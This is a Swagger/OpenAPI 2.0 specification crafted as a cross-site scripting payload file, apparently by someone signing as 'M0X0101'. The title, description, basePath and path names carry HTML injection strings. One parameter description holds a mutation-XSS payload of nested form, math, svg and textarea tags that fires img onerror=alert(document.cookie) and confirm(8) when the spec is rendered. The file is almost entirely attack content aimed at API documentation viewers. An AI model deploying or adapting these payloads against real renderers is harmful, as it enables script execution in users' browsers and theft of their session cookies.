swagger: '2.0'
info:
  title: XSS>< Attack BY M0X0101<h1>hacked</h1>
  description: |
   "><h1>
  version: production
basePath: /JSSResource"><h1>/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /M0X0101"><h1><h>:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - M0X0101_XSS_D
      operationId: findAccounts
      summary: Finds all accounts
  '/hack/hachid/{id}':
    delete:
      parameters:
        - description: |
          <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(document.cookie) src=1>"></form>   "><h1>yhacked <img src=6 onerddfror=h><img src=6 onerror=confirm(8)>
          format: int64
          in: path
          name: id
          required: true
          type: integer
      responses:
        '200':
          description: No response was specified
